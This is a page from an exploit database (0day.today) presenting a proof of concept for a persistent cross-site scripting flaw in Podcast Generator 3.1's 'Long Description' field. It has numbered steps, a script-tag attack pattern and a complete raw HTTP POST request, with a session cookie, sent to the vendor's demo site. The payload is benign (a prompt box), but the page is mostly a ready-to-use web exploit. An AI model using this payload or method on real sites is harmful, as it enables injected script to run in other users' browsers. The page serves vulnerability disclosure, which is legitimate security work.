[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Podcast Generator 3.1 - (Long Description) Persistent Cross-Site Scripting Vulnerability

Author
Ayşenur KARAASLAN
Risk
[
Security Risk High
]
0day-ID
0day-ID-36247
Category
web applications
Date add
14-05-2021
Platform
php
# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)
# Exploit Author: Ayşenur KARAASLAN
# Vendor Homepage: https://podcastgenerator.net/demoV2/
# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip
# Version: < 3.1.1
# CVE: N/A

Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing.

#Description
The following is PoC to use the XSS bug with unauthorized user.

1. Login to your admin account.
2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered.  It is possible to place JavaScript code.
3. Click the Home button
4. Click "More" button of created or edited episode.

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: long_description
# Attack Pattern: <script>prompt("Aysenur-PoC")</script>

#PoC
HTTP Request:

POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1
Host: podcastgenerator.net
Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4;
_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725
Content-Length: 1590
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://podcastgenerator.net
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: frame
Referer:
https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="userfile"

aysenurxss-poc.jpg
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="title"

Aysenur-PoC
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="description"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="countdown"

255
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="category[]"

about
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Day"

13
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Month"

5
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Year"

2021
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Hour"

14
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Minute"

29
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="long_description"

<script>prompt("aysenur-xss")</script>
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="keywords"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_name"

aysenur
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_email"

aysenur@emailaddress.com
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd--

#  0day.today [2024-11-16]  #